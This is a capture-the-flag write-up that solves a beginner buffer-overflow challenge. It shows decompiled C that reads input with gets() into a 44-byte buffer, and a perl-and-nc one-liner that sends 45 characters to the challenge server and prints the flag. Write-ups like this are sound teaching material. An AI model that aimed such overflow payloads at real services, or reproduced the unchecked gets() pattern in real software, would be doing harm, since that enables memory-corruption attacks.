Tags: bof pwn 

Rating:

## Description

I really want to have some coffee!

```
nc chall.csivit.com 30001
```

## Analysis

Decompile with Ghidra. `main()` is very simple:

```c
undefined8 main(void)
{
char local_38 [44];
int local_c;

local_c = 0;
setbuf(stdout,(char *)0x0);
setbuf(stdin,(char *)0x0);
setbuf(stderr,(char *)0x0);
puts("Please pour me some coffee:");
gets(local_38);
puts("\nThanks!\n");
if (local_c != 0) {
puts("Oh no, you spilled some coffee on the floor! Use the flag to clean it.");
system("cat flag.txt");
}
return 0;
}
```

This is the "hello world" of buffer overflows. It accepts input via `gets()` into a `local_38` buffer that holds 44 chars, and immediately after that on the stack is `local_c` which just has to be non-zero to get the flag. All you have to do is enter 45 chars of input.

## Solution

```
kali@kali:~$ perl -e 'print "A"x45 . "\n"' | nc chall.csivit.com 30001
Please pour me some coffee:

Thanks!

Oh no, you spilled some coffee on the floor! Use the flag to clean it.
csictf{y0u_ov3rfl0w3d_th@t_c0ff33_l1ke_@_buff3r}
```

Original writeup (https://github.com/dobsonj/ctf/tree/master/writeups/2020/csictf/pwn_intended#pwn-intended-0x1).